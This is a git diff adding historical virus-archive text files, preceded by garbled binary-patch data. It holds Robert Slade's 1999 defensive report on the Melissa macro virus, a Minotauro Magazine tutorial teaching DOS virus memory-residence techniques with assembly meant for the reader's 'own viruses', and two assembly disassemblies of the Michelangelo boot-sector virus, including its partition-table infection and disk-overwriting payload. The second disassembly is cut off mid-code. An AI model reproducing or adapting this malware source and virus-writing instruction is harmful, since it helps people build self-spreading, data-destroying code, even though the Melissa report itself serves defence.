zw)~;J>w(3X`?9~;mrt^g?lj&tYNHU9;np;j$<jTzj9nv<jj=@n_tPbU+Ry-n04$o2
z`o*!RK%V7(SGuBL$=@m>xu_~&UyLd%$;6;5z{E+^8)I|rQ~R%r2&f5S01D%B>4#we
z0fCQS1}&XZ8N&%T>9YI$(YdZLzWu3%ceSifkeYDC+bS}Ijg>Dd7X-!%^Tr4WJp{Oo
zyS=@*b59V~McN^$=v8))b-CN7U|<eqs%|VWxDL}INmI+$2B8>KL?)(0{k0tiLDR1)
z1Epv}A2(jrY2-qiVJJe;R)E(UgL}`2N<Bm|IHxk9Y`>jAWu;o1l{%jcaiuZ237E4T
zdRil_+JMf2%)TjT=UN<!Mx#~8z(zt>Y6GSLF)$8tFp52d9uiolok0V5Oa)!wiNq5=
z<$f`K6A8)WcbnS4n{apLP+AD@Vr*z}owhTP^0B-Id<6pJ&c!Ww29$_WhUoDLSi=!+
zi|R0u9-KFq^N4=#M@<I!IsE{x*qf+-ScO4+E2BFe{UVHu*qrm<GD!J`(zPIUR*7{b
zgBbV<sH`WH9(>FB9du9*UKj-Dx#X&UTz>dKKm2$H{sZ^!(d(95Z6a|@<}{8dlZdJ_
z5j_?eyPzSmb&q>{WaUl=dlc#3x^2>kZXVHb%m=tkW(>-JsFpdsh+7tlM`coNbT#M&
zLL$6ZJJ!cR2_!2`!H7yAV^_622OJQs>c}4Q1sP&?N|93s8y7G$2=}y9NsG_`ON^VR
zn31?r?zC}-<2R^NCq@Z;kOYT|1lJ%}PM>AoYsiK{7BV6k^a(7^^Tt--0kYd*QAZb+
zrMPHg>vbyHGE$9!!dfIAOxJeYP?^I{Gn*WrpCBX%N?;67?@>A`pQP;xX8|rbz^yFw
z2iV7^qz?Ssp%_Vfa2aF|pfU5Y=y1VVN#4-$#Yt+(?ms5M{c$)4H<m7;28qD{LUgil
zV71ih0V|tUF?IB0AQfeQk($TgO(WvE0z)Kp-EbE=vW4|3ZHFreC>NR)0>!?=g?_`4
zoAKzK^Hw9drA4n9hk(`{Z*-O0pp)a#N1PdA`X+IIpq2Iy26Q?ejYog}uRk2|jycNs
zfVpD{i=}t%rXza+A2S&SHOV3LUYfUDygi!;8NGeP!h}}l5B>J?e8z%h+j<Ro?3(Yu
zFT+mmEh2E6rvxM>5)n_*%Rl}Q7CCTLQyPyJU;#{bWUs)WMyMPlZ+94DoK-4cLv~=;
zGTksS^zMSgeFgv7*7_@fW4g5D)QbwhQS%jU!$$HF7!;63_L$(9Q#daAsRHNMun17S
z0AO0!IsgQ-9q3yf&wIv3>r-`Q;vYp~HvM!c1AK+2oM{3C036!~OSOB>RXd~S^l_o0
zqS@8##j~qd@2_89fAj3!<;}BiUYyNd(Hpt}TXRG%NN>I*0>}Jb7X_`#wyKpKkDeq4
zf-IfqW#iGRUH?9(#{jYv_V=?tug^};u1?Qi()q>w{Pq0mjNUKq#-kgIGh%$u0dJ98
zj(WXE_iP`%&XNmVYcM3VAp<9S%qQa_z};09rfj&yF|H;(!`$(JoybBN%WfuxsvrBF
zfGew5(=x>*Eat7X?CRykwAN63gV3ehf;#<#bih|eWI{Z<xa?zg3-X}hW0QeMhKPIU
zTd02K*_aLK%HGxWEnQ48FKksfiF7XSN%mvUB``aWN8sBoJnI(%TW%$IOyv&>fXk_3
zhM%zG%-R4^lMmjc_l2;o{+b;~=JGweE=q;X&SF%Nl;B%cP!35A`Sgj0Blf{eah&B|
zK&gGt`7Av=cKg0Pd}eMzzvyirTh!F=gc(qQWZnBVEwoMFh+#=Nq+=xGd#xLmU5uO<
z4`xu2j1&ejr}SOl!{I=#dF^sjBx9UjNJ$)y()%gbm>2Q9Oc^LJ_#4AE#q+qM!~GL`
zCz1|L&K@;^L+?e^q4olq0a-{?P&d55HD2FLzF~(dv)y-i;ksl6nTW*Hi#FztZBOHx
zQ*rE4%nU@y9-hs#MEMub!X?|gcLGYXUYTolLRQdOMn#(QcNGef^$_8A(LPR8@~vRg
z4ji05NVsbY66>V59}@OiE!2-Q9`@E9syVrXQ^hJuPM0Svo-#FfmK4TpxHFvQ@fsR`
zxQ(H=go@*(-NX}4NqBX@0lLa3c19G7_g^2~)1w0$r!<&<_>KV{g;p%?seo7oHj)1l
z;U`h&#=E50s?P`1%Xb5v-|ZTF$HUa^8NOLA=5%(rm?ddWkX8A3m7WkQc|y$T;^y+*
z>~eN9n?VjPU%Z4EoY8TqKdBr9hFAGX+9k{B$D+WqbWXDi&bF^CuF*eOfV{oSqJp2V
uGB;qTwA_3=N+eIW@LW5*JEEyDP%MgY6b<BL2f=|&BDkPtN?-gxKYsz}j(0Tx

literal 0
HcmV?d00001

diff --git a/textfiles.com/virus/melissa.txt b/textfiles.com/virus/melissa.txt
new file mode 100644
index 00000000..70d39435
--- /dev/null
+++ b/textfiles.com/virus/melissa.txt
@@ -0,0 +1,277 @@
+http://www.melissavirus.com/ 
+----------------------------------------------------------------- Date: Mon, 5 
+Apr 1999 05:01:14 -0700 From: secedu@all.net Subject: Information Security 
+Educators Mailing List 1999-03-30 
+---------------------------------------------
+>From: "Rob Slade, doting grandpa of Ryan and Trevor" 
+Date: Tue, 30 Mar 1999 16:51:23 -0800
+
+The Melissa macro virus
+A report prepared by Robert M. Slade
+
+
+The following is an attempt to bring together the information about
+the Melissa virus.  It is taken from the most reliable available
+sources.  Additional sites have been listed at the end of the article. 
+I have not added a copyright line to this message in order to allow it
+to be used as needed.  I will be posting the latest updated version of
+this article at http://sun.soci.niu.edu/~rslade/melissa.txt and
+http://victoria.tc.ca/techrev/melissa.txt.
+
+
+The virus, generally referred to as W97M.Melissa.A (with some
+variations: Symantec, in a rather strained effort to be cute, seems to
+be calling it "Mailissa"), is a MS Word macro virus.  This means that,
+if you don't use Word, you are safe.  Completely safe.  (Except for
+being dependent upon other people who might slow their/your mail
+server down.  More on that later.)  If you need to look at MS Word
+documents, there is a document viewer available (free, as it happens)
+>from Microsoft.  This viewer will not execute macros, so it is safe
+>from infection.
+
+In the messages about Melissa, there have been many references to the
+mythical and non-existent "Good Times" virus.  Note that simply
+reading the text of a message still cannot infect you.  However, note
+also that many mailers, in the name of convenience, are becoming more
+and more automated, and much of this automation concerns running
+attached files for you.  As Padgett Peterson, author of one of the
+best macro virus protection tools, has stated, "For years we have been
+saying you could not get a virus just by "opening E-Mail.  That bug is
+being fixed."
+
+Melissa does not carry any specifically damaging payload.  If the
+message is triggered there will be text added to the active document. 
+The mailout function can cause a large number of messages to be
+generated very quickly, and this has caused the shutdown of a number
+of corporate mail servers.
+
+If you have Word set with macros disabled, then the virus will not
+active.  However, relying on this protection is a very dangerous
+proposition.  Previous macro viruses have also killed macro protection
+in Word, and this one does as well.
+
+The name "Melissa" comes from the class module that contains the
+virus.  The name is also used in the registry flag set by the virus.
+
+The virus is spread, of course, by infected Word documents.  What has
+made it the "bug du jour" is that it spreads *itself* via email.  We
+have known about viruses being spread as attachments to email for a
+long time, and have been warning people not to execute attachments (or
+read Word documents sent as attachments) if you don't know where they
+came from.  Happy99 is a good example: it has spread very widely in
+the past month by sending itself out as an email attachment whenever
+it infects a system.
+
+Melissa was originally posted to the alt.sex newsgroup.  At that time
+it was LIST.DOC, and purported to be a list of passwords for sex
+sites.  I have seen at least one message theorizing that Melissa is
+someone's ill-conceived punishment for viewers of pornography.  This
+hypothesis is extremely unlikely.  Sending a virus to a sex related
+newsgroup seems to be a reliable way to ensure that a number of stupid
+people will read and/or execute your program, and start your new virus
+off with a bang.  (No pun intended.)
+
+If you get a message with a Melissa infected document, and do whatever
+you need to do to "invoke" the attachment, and have Word on your
+system as the default program for .doc files, Word starts up, reads in
+the document, and the macro is ready to start.  If you have Word's
+"macro security" enabled (which is not the default) it will tell you
+that there is a macro in the document.  Few people understand the
+import of the warning, and there is no distinction between legitimate
+macros and macro viruses.
+
+Because of a technical different between normal macros and "VBA
+objects," if you ask for a list of the macros in the document, Melissa
+will not show up.  It will be visible if you use the Visual Basic
+Editor, but only after you have loaded the infected file.
+
+Assuming that the macro starts executing, several things happen.
+
+The virus first checks to see if Word 97 (Word 8) or Word 2000 (Word
+9) is running.  If so, it reduces the level of the security warnings
+on Word so that you will receive no future warnings.  In Word97, the
+virus disables the Tools/Macro menu commands, the Confirm Conversions
+option, the MS Word macro virus protection, and the Save Normal
+Template prompt.  It "upconverts" to Word 2000 quite nicely, and there
+disables the Tools/Macro/Security menu.
+
+Specifically, under Word 97 it blocks access to the Tools|Macro menu
+item, meaning you cannot check any macros.  It also turns off the
+warnings for conversion, macro detection, and to save modifications to
+the NORMAL.DOT file.  Under Word 2000 it blocks access to the menu
+item that allows you to raise your security level, and sets your macro
+virus detection to the lowest level, that is, none.  (Since the access
+to the macro security menu item is blocked, I do not know how this
+feature can be reversed, other than programmatically or by
+reinstallation.)
+
+After this, the virus checks for the
+HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?\ registry key
+with a value of "... by Kwyjibo".  (The "kwyjibo" entry seems to be a
+reference to the "Bart the Genius" episode of the "Simpsons"
+television program where this word was used to win a Scrabble match.)
+
+If this is the first time you have been infected (and this "first
+time" business is slightly complicated), then the macro starts up
+Outlook, in the background, and sends itself as an attachment to the
+"top" 50 names in *each* of your address lists.  (Melissa will *not*
+use Outlook Express.)  Most people have only one (the default is
+"Contacts"), but if you have more than one then Outlook will send more
+than 50 copies of the message.  Outlook also sorts address lists such
+that mailing lists are at the top of the list, so this can get a much
+wider dispersal than just fifty copies of the message/virus.  There
+was also a mention on one message about MAPI and Exchange servers,
+which may give access to a very large number of mailing lists.  From
+other reports, though, people who use Exchange mail server are being
+particularly hard hit.  Then again, people who use Exchange are
+probably also standardized on Word and Outlook.
+
+Some have suggested setting this registry key as a preventative
+measure, but note that it only prevents the mailout.  It does not
+prevent infection.  If you are infected, and the registry key is
+removed at a later date, then a mailout will be triggered the next
+time an infected document is read.
+
+Once the messages have been sent, the virus sets the Melissa flag in
+the registry, and looks for it to check whether or not to send itself
+out on subsequent infections.  If the flag does not persist, then
+there will be subsequent mass mailings.  Because the key is set in
+HKEY_CURRENT_USER, system administrators may have set permissions such
+that changes made are not saved, and thus the key will not persist. 
+In addition, multiple users on the same machine will likely each
+trigger a separate mailout, and the probability of cross infection on
+a common machine is very high.
+
+Since it is a macro virus, it will infect your NORMAL.DOT, and will
+infect all documents thereafter.  The macro within NORMAL.DOT is
+"Document_Close()" so that any document that is worked on will be
+infected when it is closed.  When a document is infected the macro
+inserted is "Document_Open()" so that the macro runs when the document
+is opened.
+
+Note that *not* using Outlook does not protect you from the virus, it
+only means that the 50 copies will not be automatically sent out.  If
+you use Word but not Outlook, you will still be infected, and may
+still send out infected documents on your own.  The virus also will
+not invoke the mailout on Mac systems, but definitely can be stored
+and resent from Macs.  At this time I do not have reliable information
+about whether it can reproduce on Macs (there is one report that it
+does), but the likelihood is that it can.
+
+Vesselin Bontchev has noted that the virus never explicitly terminates
+the Outlook program.  It is possible that multiple copies may be
+invoked, and may create memory problems.  However, this has not been
+confirmed, and is not probable given the "first time" flag that is
+set.
+
+The message appears to come from the person just infected, of course,
+since it really is sent from that machine.  This means that when you
+get an "infected" message it will probably appear to come from someone
+you know and deal with.  The subject line is "Important Message From:
+[name of sender]" with the name taken from the registration settings
+in Word.  The test of the body states "Here is that document you asked
+for ... don't show anyone else ;-)".  Thus, the message is easily
+identifiable: that subject line, the very brief message, and an
+attached Word document (file with a .doc extension to the filename). 
+If you receive a message of this form *DO NOT OPEN THE DOCUMENT WITH
+WORD!*  If you do not have alternate means or competent virus
+assistance, the best recourse is to delete the message, and
+attachment, and to send a message to the sender alerting them to the
+fact that they are, very likely, infected.  Please note all the
+specifics in this paragraph, and do not start a panic by sending
+warnings to everyone who sends you any message with an attachment.
+
+However, please also note that, as with any Word macro virus, the
+source code travels with the infection, and it will be very easy to
+create modifications to Melissa.  (The source code has already been
+posted to one Web site.)  We will, no doubt very soon, start seeing
+many Melissa variants with different subjects and messages.  There is
+already one similar Excel macro virus, called "Papa."  The virus
+contains the text "Fred Cohen" and "all.net," leading one rather
+ignorant reporter to assume that Fred was the author.  Dr. Cohen was
+the first person to do formal research into viral programs.
+
+There is a message that is displayed approximately one time in sixty. 
+The exact trigger is if the current system time minute field matches
+the current system time day of the month field when the virus is run. 
+In that case, you will "Twenty-two points, plus triple-word-score,
+plus fifty points for using all my letters.  Game's over. I'm outta
+here." typed into your document.  (This is another reference to the
+"Simpsons" episode referred to earlier.)
+
+One rather important point: the document passed is the active
+document, not necessarily the original posted on alt.sex.  So, for
+example, if I am infected, and prepare some confidential information
+for you in Word, and send you an attachment with the Word document,
+containing sensitive information that neither you nor I want made
+public (say, the fact that Bill Gates is a jerk for having designed
+the technology this way), and you read it in Word, and you have
+Outlook on your machine, then that document will be mailed out to the
+top 50 people in your address book.
+
+Rather ironically, a clue to the identity of the perpetrator may have
+come from the identification number embedding scheme recently admitted
+by Microsoft as having been included with Office and Windows 98.
+
+A number of fixes for mail servers and mail filtering systems have
+been devised very quickly.  However, note that not all of these have
+fully tested or debugged.  One version that I saw would trap most of
+the warning messages about Melissa.
+
+Note that any Word document can be infected, and that an infected user
+may unintentionally send you an infected document.  All Word
+documents, and indeed all Office files, should be checked for
+infection before you load them.
+
+
+Information and antiviral updates (some URLs are wrapped):
+
+http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html
+
+http://www.ciac.org/ciac/bulletins/j-037.shtml
+
+ftp://ftp.complex.is/pub/macrdef2.zip
+
+http://www.complex.is/f-prot/f-prot.html
+
+http://chkpt.zdnet.com/chkpt/hud0007500a/www.zdnet.com/zdnn/stories/
+news/0,4586,2233030,00.html
+
+http://www.zdnet.com/zdnn/special/melissavirus.html
+
+http://www.symantec.com/techsupp/mailissa.html 
+
+http://www.antivirus.com/vinfo/security/sa032699.htm
+
+http://www.avp.com/melissa/melissa.html
+
+http://www.microsoft.com/security/bulletins/ms99-002.asp
+
+http://www.sendmail.com/blockmelissa.html
+
+ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
+
+http://www.innosoft.com/iii/pmdf/virus-word-emergency.html
+
+http://www.sophos.com/downloads/ide/index.html#melissa 
+
+http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
+
+http://www.pcworld.com/cgi-bin/pcwtoday?ID=10302
+
+http://www.internetnews.com/bus-news/article/0,1087,3_89011,00.html
+
+http://cnn.com/TECH/computing/9903/29/melissa.copycat.idg/
+
+http://www.pcworld.com/cgi-bin/pcwtoday?ID=10308
+
+
+======================  (quote inserted randomly by Pegasus Mailer)
+rslade@vcn.bc.ca  rslade@sprint.ca  robertslade@usa.net  p1@canada.com
+ AV tutorial   : http://victoria.tc.ca/techrev/mnvrcv.htm
+http://victoria.tc.ca/techrev    or    http://sun.soci.niu.edu/~rslade
+---------------------------------------------
+
+
+
+
diff --git a/textfiles.com/virus/memres.txt b/textfiles.com/virus/memres.txt
new file mode 100644
index 00000000..2119a0ca
--- /dev/null
+++ b/textfiles.com/virus/memres.txt
@@ -0,0 +1,185 @@
+Memory Residence Methods.
+-----------------------------------------------------------------
+
+     In this article, I'll try to explain the more common methods
+used to make viruses go resident.  The focus will be more on the
+practical than the theoretical, leaving clear the fundamentals so
+that you can take advantage of them, especially in the case of the
+MCB.  The article will show examples of the two techniques
+described which can (in the case of the MCB) be directly applied to
+your own viruses.  The theory is not very detailed, but everything
+a beginner needs to know to use these methods is present.  With the
+information the article provides, the beginner who wishes to get
+deeper into the theory can simply read a guide or manual on memory
+residence, since the necessary basics are explained here (I hope).
+
+Let's begin:
+     The most used methods to make a virus go resident are: 
+     o    those available through DOS or 
+     o    the MCB (Memory Control Block) method.
+
+     The former is the simplest way to do it, but also the most
+inefficient because it informs DOS it's leaving something behind in
+memory.  Besides, when you execute this function, control is
+returned to DOS.  Whatever program you attempt to run will
+terminate!  The virus which uses this technique must re-execute
+itself to avoid exiting to DOS during it's installation into
+memory.  To remain resident, it executes itself again (service 4bh)
+and during it's second execution it hooks Int27h or calls service
+31 of Int 21, in it's turn giving control to the "father" program
+(the one loaded first).  The father program can then end, executing
+the host.  If this isn't done (like when executing Int 21), control
+would be passed to the command interpreter.
+
+     One characteristic of viruses which use this technique is that
+they tend to attach to the beginning of the file; these services
+will resident the amount of required from the beginning of the file
+in memory....  If we have a 50K .COM and the virus is at the end,
+and we use Int 27 to attempt to leave resident 1K, for example,
+what would be placed in memory would be the first K of the COM, not
+the virus.  Obviously, we can't just leave 50K resident.... we can
+make the virus go resident we can move (it?) to another block,
+transfer control, and then this will give control to the "father"
+program.  To avoid all this, many viruses attach themselves to the
+beginning of the programs they infect.  Of course, this is slow,
+since we have to read the whole file and copy it after the virus. 
+If the virus attaches to the end of the file, we only have to write
+the virus, not the virus AND the file.  This method is not very
+elegant; more than just slow, other things can happen if the
+infection places the virus at the beginning........
+
+Below is the source to a TSR, NOT a virus, just a normal TSR to
+illustrate how it works.  This example hooks Int 21 and then passes
+control without doing anything.  Code can be added to make it do
+what ever you want.
+
+===================================================================
+===================================================================
+code    segment 
+        assume cs:code,ds:code
+        org   100h             
+start:
+     jmp  instalar            ;Jump to the installation
+                              ;routine.
+
+;We put the original Int21 address in this variable.
+old_21    dd   2
+
+new_21:
+
+;Here's the routine which hooks Int 21.
+
+     jmp  cs:[old_21]              ;Jump to the original int.
+
+instalar:
+
+;Obtain the original Int 21 Vector
+     mov  ax, 3521h
+     int  21h
+     mov  word ptr old_21, bx 
+     mov  word ptr old_21+2, es    
+
+;Set the new Int 21 vector.
+        mov     ax,2521h          
+        push cs
+        pop  ds
+        mov     dx, offset new_21
+        int     21h
+
+;Now it's resident
+     mov  ah, 31h
+     mov  dx, 30d    ;<--------- Number of paragraphs(16 bytes)   
+     int  21h        ;leave resident.    
+
+code    ends
+end  start
+===================================================================
+===================================================================
+
+    The second method is a little more complex than simply calling
+Int 27h, but it's much more effective.  To understand how it works,
+you must be aware that DOS creates a control block for each memory
+block used.  This control block is 16 bytes long (a paragraph)and
+is just above the assigned memory block.  In a COM file, for
+example, CS - 1 contains the address of this block.  In offset 3 of
+the same we can find the amount of memory used by the program.... 
+To make our program resident, we must subtract from that value the
+length of the virus, free up the memory which is no longer used
+(service 4ah), and assign it to our program (service 48h).  We
+finish by marking the MCB of the segment to which we moved our
+virus with '8' in offset 1, to fool DOS into not using that part of
+memory.  When we mark the block we use an '8' to identify it
+because DOS uses the same.
+
+    The code that follows shows how it's done.....  the code will
+leave a virus resident from a COM file.  To load a virus from an
+EXE we must keep in mind that the MCB segment to be modified is
+obtained by subtracting 1 from DS, not CS.
+
+===================================================================
+===================================================================
+;I pass the code segment to AS, I subtract it and pass to ES to   
+;obtain the amount of memory reserved by the host program (ES:[3]),
+;which is in AX.......
+
+     mov  ax, cs         ;With this we obtain the MCB segment.
+     dec  ax             
+
+     mov  es, ax              ;Here we obtain from the MCB the 
+     mov  ax, es:[3]          ;amount of memory used.
+
+;I subtract the length of the virus from the memory used by the
+;host and place the result in AX
+
+     sub  ax, bx         ;BX contains the length of the virus
+                         ;in paragraphs
+
+;We pass the result of the previous operation to BX so as to then
+;call the service which frees memory, with the new size and the
+;segment in ES.
+     push bx             ;Save the amount of memory to be reserved
+     mov  bx, ax         ;Pass the new amount to BX.
+     push cs 
+     pop  es
+     mov  ah, 4ah
+     int  21h
+
+;I assign the freed memory to my virus, the assigned memory segment
+;goes to AX.  I decrease BX because DOS will use one paragraph.
+
+     pop  bx             ;Pop the amount of memory to be reserved.
+     dec  bx
+     mov  ah, 48h
+     int  21h
+
+;I decrease AX and pass it to ES; that way I point to the paragraph
+;DOS uses as a control, I mark the paragraph at offset 1 with an 8 
+;so that DOS thinks it's a part of itself and not use this part of 
+;memory.  I then increment AX again and pass it to ES, so that ES 
+;points to the memory the virus will use.
+
+     dec  ax
+     mov  es, ax
+     mov  word ptr es:[1], 8
+     mov  word ptr es:[8],'XX'    ;Optional: name that block.
+     inc  ax
+     mov  es, ax
+
+     push es                    ;Save the address of the virus    
+                                ;segment.
+
+===================================================================
+===================================================================
+
+All that remains is to move the virus to the reserved segment, a
+simple matter of doing a "rep movsb" to the segment to which ES
+points and that's it, the virus is resident.
+
+NOTE:
+The routine by itself does not set off any alarms;  TBAV's
+residence alarm is set off when it detects a hook to Int 21h or
+13h.
+
+
+                    Text by Zarathustra for Minotauro Magazine
+ 
diff --git a/textfiles.com/virus/michael.asm b/textfiles.com/virus/michael.asm
new file mode 100644
index 00000000..1a5a7820
--- /dev/null
+++ b/textfiles.com/virus/michael.asm
@@ -0,0 +1,234 @@
+
+; This is a disassembly of the much-hyped michelangelo virus.
+; As you can see, it is a derivative of the Stoned virus.  The
+; junk bytes at the end of the file are probably throwbacks to
+; the Stoned virus.  In any case, it is yet another boot sector
+; and partition table infector.
+
+michelangelo    segment byte public
+		assume  cs:michelangelo, ds:michelangelo
+; Disassembly by Dark Angel of PHALCON/SKISM
+		org     0
+
+		jmp     entervirus
+highmemjmp      db      0F5h, 00h, 80h, 9Fh
+maxhead         db      2                       ; used by damagestuff
+firstsector     dw      3
+oldint13h       dd      0C8000256h
+
+int13h:
+		push    ds
+		push    ax
+		or      dl, dl                  ; default drive?
+		jnz     exitint13h              ; exit if not
+		xor     ax, ax
+		mov     ds, ax
+		test    byte ptr ds:[43fh], 1   ; disk 0 on?
+		jnz     exitint13h              ; if not spinning, exit
+		pop     ax
+		pop     ds
+		pushf
+		call    dword ptr cs:[oldint13h]; first call old int 13h
+		pushf
+		call    infectdisk              ; then infect
+		popf
+		retf    2
+exitint13h:     pop     ax
+		pop     ds
+		jmp     dword ptr cs:[oldint13h]
+
+infectdisk:
+		push    ax
+		push    bx
+		push    cx
+		push    dx
+		push    ds
+		push    es
+		push    si
+		push    di
+		push    cs
+		pop     ds
+		push    cs
+		pop     es
+		mov     si, 4
+readbootblock:
+		mov     ax,201h                 ; Read boot block to
+		mov     bx,200h                 ; after virus
+		mov     cx,1
+		xor     dx,dx
+		pushf
+		call    oldint13h
+		jnc     checkinfect             ; continue if no error
+		xor     ax,ax
+		pushf
+		call    oldint13h               ; Reset disk
+		dec     si                      ; loop back
+		jnz     readbootblock
+		jmp     short quitinfect        ; exit if too many failures
+checkinfect:
+		xor     si,si
+		cld
+		lodsw
+		cmp     ax,[bx]                 ; check if already infected
+		jne     infectitnow
+		lodsw
+		cmp     ax,[bx+2]               ; check again
+		je      quitinfect
+infectitnow:
+		mov     ax,301h                 ; Write old boot block
+		mov     dh,1                    ; to head 1
+		mov     cl,3                    ; sector 3
+		cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
+		je      is360Kdisk
+		mov     cl,0Eh
+is360Kdisk:
+		mov     firstsector,cx
+		pushf
+		call    oldint13h
+		jc      quitinfect              ; exit on error
+		mov     si,200h+offset partitioninfo
+		mov     di,offset partitioninfo
+		mov     cx,21h                  ; Copy partition table
+		cld
+		rep     movsw
+		mov     ax,301h                 ; Write virus to sector 1
+		xor     bx,bx
+		mov     cx,1
+		xor     dx,dx
+		pushf
+		call    oldint13h
+quitinfect:
+		pop     di
+		pop     si
+		pop     es
+		pop     ds
+		pop     dx
+		pop     cx
+		pop     bx
+		pop     ax
+		retn
+entervirus:
+		xor     ax,ax
+		mov     ds,ax
+		cli
+		mov     ss,ax
+		mov     ax,7C00h                ; Set stack to just below
+		mov     sp,ax                   ; virus load point
+		sti
+		push    ds                      ; save 0:7C00h on stack for
+		push    ax                      ; later retf
+		mov     ax,ds:[13h*4]
+		mov     word ptr ds:[7C00h+offset oldint13h],ax
+		mov     ax,ds:[13h*4+2]
+		mov     word ptr ds:[7C00h+offset oldint13h+2],ax
+		mov     ax,ds:[413h]            ; memory size in K
+		dec     ax                      ; 1024 K
+		dec     ax
+		mov     ds:[413h],ax            ; move new value in
+		mov     cl,6
+		shl     ax,cl                   ; ax = paragraphs of memory
+		mov     es,ax                   ; next line sets seg of jmp
+		mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
+		mov     ax,offset int13h
+		mov     ds:[13h*4],ax
+		mov     ds:[13h*4+2],es
+		mov     cx,offset partitioninfo
+		mov     si,7C00h
+		xor     di,di
+		cld
+		rep     movsb                   ; copy to high memory
+						; and transfer control there
+		jmp     dword ptr cs:[7C00h+offset highmemjmp]
+; destination of highmem jmp
+		xor     ax,ax
+		mov     es,ax
+		int     13h                     ; reset disk
+		push    cs
+		pop     ds
+		mov     ax,201h
+		mov     bx,7C00h
+		mov     cx,firstsector
+		cmp     cx,7                    ; hard disk infection?
+		jne     floppyboot              ; if not, do floppies
+		mov     dx,80h                  ; Read old partition table of
+		int     13h                     ; first hard disk to 0:7C00h
+		jmp     short exitvirus
+floppyboot:
+		mov     cx,firstsector          ; read old boot block
+		mov     dx,100h                 ; to 0:7C00h
+		int     13h
+		jc      exitvirus
+		push    cs
+		pop     es
+		mov     ax,201h                 ; read boot block
+		mov     bx,200h                 ; of first hard disk
+		mov     cx,1
+		mov     dx,80h
+		int     13h
+		jc      exitvirus
+		xor     si,si
+		cld
+		lodsw
+		cmp     ax,[bx]                 ; is it infected?
+		jne     infectharddisk          ; if not, infect HD
+		lodsw                           ; check infection
+		cmp     ax,[bx+2]
+		jne     infectharddisk
+exitvirus:
+		xor     cx,cx                   ; Real time clock get date
+		mov     ah,4                    ; dx = mon/day
+		int     1Ah
+		cmp     dx,306h                 ; March 6th
+		je      damagestuff
+		retf                            ; return control to original
+						; boot block @ 0:7C00h
+damagestuff:
+		xor     dx,dx
+		mov     cx,1
+smashanothersector:
+		mov     ax,309h
+		mov     si,firstsector
+		cmp     si,3
+		je      smashit
+		mov     al,0Eh
+		cmp     si,0Eh
+		je      smashit
+		mov     dl,80h                  ; first hard disk
+		mov     maxhead,4
+		mov     al,11h
+smashit:
+		mov     bx,5000h                ; random memory area
+		mov     es,bx                   ; at 5000h:5000h
+		int     13h                     ; Write al sectors to drive dl
+		jnc     skiponerror             ; skip on error
+		xor     ah,ah                   ; Reset disk drive dl
+		int     13h
+skiponerror:
+		inc     dh                      ; next head
+		cmp     dh,maxhead              ; 2 if floppy, 4 if HD
+		jb      smashanothersector
+		xor     dh,dh                   ; go to next head/cylinder
+		inc     ch
+		jmp     short smashanothersector
+infectharddisk:
+		mov     cx,7                    ; Write partition table to
+		mov     firstsector,cx          ; sector 7
+		mov     ax,301h
+		mov     dx,80h
+		int     13h
+		jc      exitvirus
+		mov     si,200h+offset partitioninfo ; Copy partition
+		mov     di,offset partitioninfo      ; table information
+		mov     cx,21h
+		rep     movsw
+		mov     ax,301h                 ; Write to sector 8
+		xor     bx,bx                   ; Copy virus to sector 1
+		inc     cl
+		int     13h
+;*              jmp     short 01E0h
+		db      0EBh, 32h               ; ?This should crash?
+; The following bytes are meaningless.
+garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
+partitioninfo:  db      42h dup (0)
+michelangelo    ends
+		end
diff --git a/textfiles.com/virus/michangl.txt b/textfiles.com/virus/michangl.txt
new file mode 100644
index 00000000..234c2b4c
--- /dev/null
+++ b/textfiles.com/virus/michangl.txt
@@ -0,0 +1,225 @@
+;     Michelangelo
+;     Size: 512
+;     Type: Boot infector
+;     Date of action: March 6th
+;
+;
+ 
+data_1e		equ	4Ch			; (0000:004C=1DB1h)
+data_2e		equ	4Eh			; (0000:004E=70h)
+data_3e		equ	413h			; (0000:0413=280h)
+data_4e		equ	7C05h			; (0000:7C05=203Ch)
+data_5e		equ	7C0Ah			; (0000:7C0A=49EBh)
+data_6e		equ	7C0Ch			; (0000:7C0C=2A3Ch)
+data_7e		equ	7			; (694E:0007=0)
+data_8e		equ	8			; (694E:0008=0)
+data_9e		equ	0Ah			; (694E:000A=0)
+data_11e	equ	7C03h			; (694E:7C03=0)
+  
+seg_a		segment
+		assume	cs:seg_a, ds:seg_a
+  
+  
+		org	100h
+  
+mich		proc	far
+  
+start:                      
+		jmp	loc_6 ; (01AF) "This is what you see at sector 0"
+		db	0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
+		db	0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
+		db	50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
+		db	0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
+		db	4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
+		db	9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
+		db	9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
+		db	2, 0, 58h, 1Fh, 2Eh, 0FFh
+		db	2Eh, 0Ah, 0, 50h, 53h, 51h
+		db	52h, 1Eh, 6, 56h, 57h, 0Eh
+		db	1Fh, 0Eh, 7, 0BEh, 4, 0
+loc_1: ;Init registers
+		mov	ax,201h
+		mov	bx,200h
+		mov	cx,1
+		xor	dx,dx			; Zero register
+		pushf				; Push flags
+		call	dword ptr ds:data_9e	; (694E:000A=0)
+		jnc	loc_2			; Jump if carry=0
+		xor	ax,ax			; Zero register
+		pushf				; Push flags
+		call	dword ptr ds:data_9e	; (694E:000A=0)
+		dec	si
+		jnz	loc_1			; Jump if not zero
+		jmp	short loc_5		; (01A6)
+loc_2: ;Zero registers clear direction
+		xor	si,si			; Zero register
+		cld				; Clear direction
+		lodsw				; String [si] to ax
+		cmp	ax,[bx]
+		jne	loc_3			; Jump if not equal
+		lodsw				; String [si] to ax
+		cmp	ax,[bx+2]
+		je	loc_5			; Jump if equal
+loc_3: ; cmp byte ptr See infected
+		mov	ax,301h
+		mov	dh,1
+		mov	cl,3
+		cmp	byte ptr [bx+15h],0FDh
+		je	loc_4			; Jump if equal
+		mov	cl,0Eh
+loc_4: ;call out all db hiden data
+		mov	ds:data_8e,cx		; (694E:0008=0)
